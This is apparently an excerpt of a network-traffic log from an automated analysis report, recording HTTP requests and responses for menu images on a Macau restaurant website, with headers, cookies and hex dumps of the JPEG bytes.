                                                                                                                                                              Data Ascii: ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 12:02:390221^nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:12.748543978 CET1940OUTGET /images/menu05.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.953300953 CET1970INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 19377
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e84d53f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 12 0f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 69 00 00 01 01 00 03 00 00 00 01 00 1c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 36 20 31 36 3a 33 36 3a 31 34 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 69 a0 03 00 04 00 00 00 01 00 00 00 1c 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 10 89 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*i(12i ''Adobe Photoshop CS6 (Windows)2020:05:26 16:36:140221inv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:15.653748989 CET2338OUTGET /images/menu03b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:15.858443975 CET2356INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2264
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a1439f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:21 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 8c 00 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 08 10 00 01 03 03 03 03 04 01 02 07 00 00 00 00 00 00 03 01 02 04 11 05 06 00 12 13 21 22 14 31 41 15 07 16 42 62 61 32 23 33 24 34 17 11 00 02 01 03 02 03 06 05 05 01 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 41 05 51 61 71 22 32 13 81 42 52 14 15 f0 a1 b1 c1 06 33 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef bb f5 f9 66 b8 14 6f d2 94 6f d2 94 6f d2 94 6f d2 94 cc a8 b3 20 bc 63 9b 10 d0 c8 61 0c e2 19 c6 e1 b9 c2 2b 51 c3 23 51 c8 95 6b 9a b5 45 f4 54 f4 d6 99 30 be 22 03 a9 04 80 75 11 a1 d4 1f 03 c8 d4 91 1c 69 6d fa ce a2 8d fa 52 8d fa 52 99 95 16 64 17 8c 73 62 1a 19 0c 21 9c 43 38 dc 37 38 45 6a 38 64 6a 39 12 ad 73 56 a8 be 8a 9e 9a d3 26 17 c4 40 75 20 90 0e a2 34 3a 83 e0 79 1a 92 23 8d 2d bf 59 d4 51 bf 4a 51 bf 4a 57 50 c3 64 12 cb 81 67 59 45 a9 e8 1c 8a 1c 9b 6c 08 d7 16 b7 fa d0 a3 ca 71 54 a4 0b a9 d8 e2 2b 11 9b d3 aa 7b 2a 2a eb e9 fa 53 1d be c3 71 b8 c5 a6 50 51 43 73 45 69 92 a7 91 31 13 c4 72 af 46 3d 10 91 c7 4a b0 b1 40 5f b2 b1 fc 2b f2 e9 52 24 dc 25 65 af b2 0e f9 b9 be 71 a0 ba 27 33 da e3 11 af 52 71 11 12 8a e4 75 37 53 5d 4d 9e 0f cb ed f0 7d d1 25 8e 6f 6e ff 00 9c a5 b7 1f 31 9b ad 3c 09 98 98 ab a8 f7 14 5d db 15 0d 8f 61 96 ab b5 9e d1 70 91 22 53 0d 70 cd 62 63 66 68 dc c4 6a 45 90 3d ee 7b 51 46 ab c8 8b e8 aa b4 fd ba e3 ec ba 46 2c f8 51 d8 b4 b6 e1 71 18 8f 4b 09 9e 1e af db ba b3 5c 60 80 7b e2 a5 b2 b8 d8 fc 0b e4 bb 5d 89 93 c7 16 db 20 b1 24 4b 9e 51 95 e6 70 88 ac 52 34 62 10 d0 69 d3 f9 55 cf 5f dd ed ae 7f 52 c5 b7 c5 9d b1 e1 ba 14 90 4b 10 66 0c 4c 00 23 c2 5b c6 a8 e0 03 02 ba 37 d9 b9 25 f3 17 ca ae f8 85 8e 69 2d 98 b5 b2 38 a0 c3 b1 b1 1a b1 0c 02 47 62 a9 4a 17 22 8c ae 2a b9 5f bd c8 ab 55 aa 2f 44 d7 77 fd 06 fb 3e cf 76 fb 5c 2c 57 0a 80 a1 3e 52 a5 46 a5 78 31 6e 37 10 4f 61 ad 73 31 56 2a 38 56 fb 26 b1 63 b9 1c c8 b0 48 eb 88 32 08 5f 5f c2 ba c7 98 d2 0b c3 ac 2b 68 cc 81 70 78 dc 47 6f 63 57 bd 08 da 2d 3b 17 d5 7d 9d 43 65 b6 dd b8 43 78 c8 36 ca e0 c8 b3 c9 8c 1b 6d 89 32 07 aa e1 07 e5 35 77 55 63 1c ed fe aa 7e d9 80 e3 07 bb 62 f8 84 d3 dd 17 23 ca ad 41 b8 06 f0 12 89 b0 63 12 60 16 44 71 ba 32 81 c4 23 51 b4 47 bd 0a df 7a 27 4d 78 b6 fd 13 6a d9 70 ed 5c bf bb 95 03 5c 08 b1 4b 0b 94 5b 69 2c 3e a3 70 f0 d2 a8 31 2c 85 d6 48 a9 eb be 3f 8a 63 d6 db 34 5b 93 ee b2 72 0b ed 94 77 68 d3 a2 90 0d 84 17 c9 dc b1
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedd!"1ABba2#3$4!1AQaq"2BR3?foooo ca+Q#QkET0"uimRRdsb!C878Ej8dj9sV&@u 4:y#-YQJQJWPdgYElqT+{**SqPQCsEi1rF=J@_+R$%eq'3Rqu7S]M}%on1<]ap"SpbcfhjE={QFF,QqK\`{] $KQpR4biU_RKfL#[7%i-8GbJ"*_U/Dw>v\,W>RFx1n7Oas1V*8V&cH2__+hpxGocW-;}CeCx6m25wUc~b#Ac`Dq2#QGz'Mxjp\\K[i,>p1,H?c4[rwh
                                                                                                                                                              Mar 13, 2023 05:26:16.282017946 CET2412OUTGET /images/menu06b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:16.486946106 CET2433INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1595
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "20ea6ff8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:22 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 48 03 01 11 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 07 06 03 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 08 10 00 01 04 02 02 00 06 01 03 05 01 00 00 00 00 00 03 01 02 04 05 11 06 00 12 21 41 22 13 14 07 31 71 42 15 51 61 a1 32 52 08 11 00 02 01 03 02 04 04 05 05 01 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 41 51 05 61 22 42 13 f0 81 b1 32 52 71 a1 72 14 06 43 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 df 7b f3 f2 cd 7c 0a 77 e2 94 ef c5 29 df 8a 53 bf 14 a7 7e 29 4e fc 52 9d f8 a5 3b f1 4a d7 ed ae 2d 34 cd 1b eb b5 d5 27 9a 9d 36 08 f3 2c 2e 6c e1 aa 88 b2 e4 8e 4a 89 02 42 37 c5 cc 0b 51 13 db cf 5f 1c aa 65 79 eb b7 3b 9c bd bf 63 b6 fe b3 14 f7 03 33 32 e8 59 83 44 13 cc 28 f4 f0 d6 48 ad 2c c5 11 6d d2 6a bc 14 da e9 6b f5 ad 83 6d 5b 39 f3 f7 eb 19 5d 12 a5 d1 e2 0e 30 c4 74 09 08 e6 2c 72 a1 1e e2 39 55 06 c4 62 22 79 f8 f2 84 d9 ed 9b 1e 2c fb 9b d9 b3 b3 7d 96 a8 50 0d a4 c5 ad 26 7d 22 dd 39 d7 02 88 05 a7 5a b1 9b a3 6a 7a cc 3b 63 6c 67 b4 b3 3d 7e d8 7d 74 4d ac 30 23 b1 e2 10 c6 4f 79 ce 28 4c a8 e4 47 2e 5a 88 b9 5f 0c b7 19 5b f2 f6 6d a6 cd 1c e7 2e c5 73 1c 5e 42 aa 20 00 6e d5 5b 5d 78 7c b4 e3 5d 38 95 41 99 e3 15 63 77 ad ea da be a5 bc d7 4c ac 91 69 63 45 b5 06 b6 35 c8 ce 00 15 51 d1 e4 b8 2b 97 45 2b 9a c4 46 a2 90 68 ef 5b b0 a8 e6 e3 97 ee fb 7e d7 65 b4 dc 63 64 2c c9 98 28 69 00 fd ad 1e 86 20 7e 4b 3e 63 cc 45 75 91 55 48 e8 6a 1c 9f ac e1 26 bd 6f 21 a1 9b 55 77 4d 1e b8 ce 64 fb 0a f2 38 df 30 e2 0b d0 b5 d1 d1 d2 22 a2 7b a8 e6 a9 1e ec a7 e7 0a bc a9 ff 00 cf 27 f5 dd a1 97 22 04 3e 67 43 37 90 a6 71 ac be 3f ba 45 c4 cf 85 70 e1 10 7a 88 e6 3e 9c a8 1a 3d 06 97 ec 3a bd 50 b0 ee 6c e7 56 6c 10 eb a6 12 41 a3 7c 39 8b ee a0 ca aa 17 47 57 0d 88 45 45 ea aa 4f 71 99 4e cc cf 64 26 cb b7 ed fb 8a 6d 8a e4 66 5c aa a6 4a d8 fa c1 f2 db 20 4f 2f 35 cb a4 ac cd 02 a2 b8 5d 78 d6 71 b9 2d 4b 36 6b 90 d3 41 35 74 48 f3 0e 25 8c 63 0c d8 7b 0a f4 55 1f b6 10 23 19 f8 ea de ab 8f fa 5e 7c 1e ea 31 0d ce 41 89 4a a8 62 20 90 79 9e 10 ab 03 a0 8d 3a 9a ab 24 5c 62 b7 01 e5 9f fa 5e 67 74 56 a3 6c a6 15 7c 3f 67 c2 23 fb 7e 9d 7c 7f 4e 7a f0 23 fd 33 4f e6 c7 e5 61 3f 4a d3 ff 00 7f 8e 95 97 8f 59 a7 3e 98 cb 9a c0 ca bd b6 1c 62 c8 bb f8 f6 11 83 fc 62 b0 ea 36 fb b5 ee 8e f3 94 7d 11 ae 52 30 88 df 57 8f 5c 78 f9 e1 db b0 b6 cb dd c6 0b bc 12 d0 ea 3d bd 63 5c 76 97 65 88 37 06 03 5d 62 35 a2 c1 6c 8d 4f eb c3 e5 5c d5 56 ef b1 d3 40 6d 54 39 a1 25 68 cf f2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedH!A"1qBQa2R!1AQa"B2RqrC?{|w)S~)NR;J-4'6,.lJB7Q_ey;c32YD(H,mjkm[9]0t,r9Ub"y,}P&}"9Zjz;clg=~}tM0#Oy(LG.Z_[m.s^B n[]x|]8AcwLicE5Q+E+Fh[~ecd,(i ~K>cEuUHj&o!UwMd80"{'">gC7q?Epz>=:PlVlA|9GWEEOqNd&mf\J O/5]xq-K6kA5tH%c{U#^|1AJb y:$\b^gtVl|?g#~|Nz#3Oa?JY>bb6}R0W\x=c\ve7]b5lO\V@mT9%h
                                                                                                                                                              Mar 13, 2023 05:26:21.624658108 CET2502OUTGET /images/menu04b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.849910021 CET2522INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1961
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "266247f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 5a 03 01 11 00 02 11 01 03 11 01 ff c4 00 85 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 08 10 00 01 03 04 01 04 02 03 00 03 00 00 00 00 00 00 03 01 02 04 11 12 05 06 00 21 22 13 07 31 41 32 14 15 51 61 16 11 00 02 01 03 03 03 03 03 03 05 01 00 00 00 00 00 01 02 11 00 12 03 21 31 04 41 13 05 51 61 22 71 81 32 91 a1 42 f0 d1 52 62 23 15 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b7 f3 e5 9a e0 52 fe 29 4b f8 a5 2f e2 94 bf 8a 52 fe 29 4b f8 a5 49 34 49 b1 e3 c4 97 22 21 c1 17 20 d7 ba 04 92 0d cd 19 da 37 2b 1e a3 7a a2 23 d1 ae 45 6a d3 e1 7a 73 23 61 74 55 66 52 03 4c 18 d0 c1 83 07 ac 1d 0c 75 a9 83 51 af e6 3a 8a 5f c5 29 7f 14 a5 fc 52 ba b4 0c 84 cd 63 d5 71 73 7a ec a7 e3 73 19 bd 80 f0 b2 b9 a8 aa a3 94 30 47 8e 32 0a 3b 0c da 38 6d 72 b9 5e b6 aa 5d f0 bd 12 9c f5 58 72 bf 0f c5 0c b8 09 57 7c a5 59 86 8c 02 a8 21 43 6e 01 99 31 bd 6c 02 57 1c 8d c9 ab 44 ac 2c 7d df 0d a9 66 f6 07 90 79 d9 5a ce c3 3e 7c d0 58 33 4b 5c 4a b9 61 94 f7 35 d7 dd 45 6b 9d 4a b9 13 e7 ef 9d 0c 9c 35 f2 58 70 e6 cf 3d c3 8b 33 12 20 16 ed 7e 05 b4 d6 76 27 73 1b d5 ca de 01 3b c1 fd aa b3 ad e8 38 3c b8 fd 70 59 d3 27 05 9b 72 67 57 2c e0 38 6a a3 4c 5b 1c e1 28 5a e6 7d d3 b9 1c ab 5f ab 79 cf e0 78 4c 19 c7 14 bb 30 ee f7 6e 88 d3 b6 34 b7 4f d6 67 ed 54 4c 40 db 3d 67 f6 aa 2c 32 e2 89 b5 62 17 0b 1a 5c 5c 7f ef c5 41 0a 69 d9 20 ca a8 56 d5 ce 78 c4 16 a5 7e 69 6f 4f 8a af cf 39 18 bb 47 96 9d a0 c1 6e 5f c8 86 3b 8e a0 28 fb 46 9e a6 b1 88 b8 45 76 dd ef 3b 0a 4c cd df 55 cd 6d 0e da 66 65 b6 c4 1e 0b 1e d6 c9 7a e1 04 39 84 43 23 4d 2c 4c 6b 15 58 a8 2b 03 73 3a 56 b4 e7 ad f3 3c b4 77 e4 71 b2 e6 ee b3 e6 f8 0f 91 ec 80 e6 ef 93 80 06 9f 1b 52 57 de b6 32 30 24 a9 33 af e9 55 6c 9e 9b a5 42 ca ef 6c 0f f6 df 89 f5 e5 e3 c8 5d 22 3a c9 9c 72 4a 64 50 b0 54 8d 68 18 d7 2a de f7 21 2a 94 54 6b 6b 6f 39 dc 8f 11 c2 c7 97 90 07 72 ce 3e fa ad ce 4b 04 50 3e 30 80 19 96 37 4f 40 36 aa 1c 6a 09 de 05 7a 2f 5f 6b 52 23 43 d9 47 27 24 3d 60 ba cc ac fc 8c 53 88 17 64 10 91 25 24 37 47 69 fc 2d 1d ae 23 91 50 8a 2f c6 bd bc 2f 83 e3 32 af 20 17 ed 1c 4d 90 ac 8b e5 5a cb 6e 88 82 48 21 ad db f8 d3 b4 bb eb 11 35 65 36 03 5e da b1 1e af c7 45 5c 8c 3c 32 6b fb 24 d8 ec 29 44 e9 2d 2c 53 c8 35 8f 23 44 8c 73 7c ad 54 aa 31 aa ad fa 6a fc 6f bf 07 8f cd c3 c4 c6 b7 04 ed 66 61 24 5d 2a 59 a0 98 82 2e 1e 82 47 a1 ab 94 0c 14 74 83 54 ed 6b d7 d8 9c d6 1f 55 ca c9 9b 2e 3b 72 2e ce 1f
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedZ!"1A2Qa!1AQa"q2BRb#?R)K/R)KI4I"! 7+z#Ejzs#atUfRLuQ:_)Rcqszs0G2;8mr^]XrW|Y!Cn1lWD,}fyZ>|X3K\Ja5EkJ5Xp=3 ~v's;8<pY'rgW,8jL[(Z}_yxL0n4OgTL@=g,2b\\Ai Vx~ioO9Gn_;(FEv;LUmfez9C#M,LkX+s:V<wqRW20$3UlBl]":rJdPTh*!*Tkko9r>KP>07O@6jz/_kR#CG'$=`Sd%$7Gi-#P//2 MZnH!5e6^E\<2k$)D-,S5#Ds|T1jofa$]*Y.GtTkU.;r.
                                                                                                                                                              Mar 13, 2023 05:27:04.327224016 CET3287OUTGET /images/title_chocology.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.565656900 CET3305INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2612
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "3c65aff9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
